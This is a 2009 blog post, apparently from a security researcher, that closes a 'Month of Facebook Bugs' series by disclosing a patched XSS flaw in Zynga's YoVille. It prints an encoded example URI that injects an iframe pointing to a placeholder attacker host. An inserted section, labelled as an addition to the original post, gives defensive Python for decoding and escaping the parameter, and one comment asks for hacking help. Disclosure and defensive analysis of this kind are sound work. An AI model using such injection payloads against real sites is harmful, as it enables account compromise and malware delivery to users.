Sep. 30, 2009

Posted by in FAXX Hacks | 4 comments

FAXX Hack: YoVille

We’ve come to the end of the Month of Facebook Bugs – today’s post marks the last published FAXX Hack for September. The series began with a vulnerability in the no. 1 Facebook application, FarmVille from Zynga. Today we end with a very similar hole in another major Zynga application, discovered about two weeks ago.

I have much to cover in recapping this month, and it will likely take a few days to put everything together. I plan on posting a full report that includes statistics and more detailed explanations on how some of these hacks work. Also, as promised, I intend to post demonstration code showing how these holes can be exploited to access user information and spread virally, in addition to standard XSS issues, such as delivering malware.

Thanks for your interest in the Month of Facebook Bugs, and please stay tuned for the upcoming final report.

Facebook Verified Application

Current Monthly Active Users: 17,944,265

Current Rank on Application Leaderboard: 9

Application Developer: Zynga

Responsiveness: Zynga has been one of the most responsive developers I contacted. They replied quickly and patched the hole soon after.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/yoville/index.php?type=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F
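The `type` value in the example URI above is percent-encoded more than once, so a check that decodes it a single time sees different content than the fully decoded value. The following is an added example, not code from the original post or from Zynga: it decodes the parameter layer by layer, lists the tags visible at each stage, and shows attribute-context output encoding. The function names are hypothetical, and it assumes nothing about how the application reflected the parameter beyond what the URI itself shows.

```python
import html
import re
from urllib.parse import unquote_plus, urlsplit

# Example URI exactly as published on this page (EVILURI is the page's placeholder).
EXAMPLE_URI = (
    "http://apps.facebook.com/yoville/index.php?type=%22%2F%253E%253Cfb%253A"
    "iframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F"
)
TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z][\w:-]*")  # opening/closing HTML or FBML tag

def raw_param(uri, name):
    """Return the still-encoded value of query parameter `name`, or None."""
    for pair in urlsplit(uri).query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            return value
    return None

def decode_layers(raw, max_rounds=5):
    """Percent-decode until the value stops changing; stage 0 is the raw value."""
    stages = [raw]
    for _ in range(max_rounds):
        decoded = unquote_plus(stages[-1])
        if decoded == stages[-1]:
            break
        stages.append(decoded)
    return stages

def audit(uri, name):
    """Per decoding stage: the tags it contains and whether it carries a raw quote."""
    return [
        {"stage": i, "value": s, "tags": TAG_RE.findall(s), "quote": '"' in s}
        for i, s in enumerate(decode_layers(raw_param(uri, name)))
    ]

def render_attr(value):
    """Output encoding for a value placed inside an HTML/FBML attribute."""
    return html.escape(value, quote=True)

if __name__ == "__main__":
    for row in audit(EXAMPLE_URI, "type"):
        print(row["stage"], row["quote"], row["tags"], row["value"])
        print("   escaped:", render_attr(row["value"]))
```

Validation should run on the value only after decoding has reached a fixed point, and the escaping step belongs at the point of output regardless of what input checks ran earlier.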

  1. OzzyGreene says:

    t.y. u did well, that was gr8

  2. 2 things 1 can ppl join my website and 2 i need help hacking
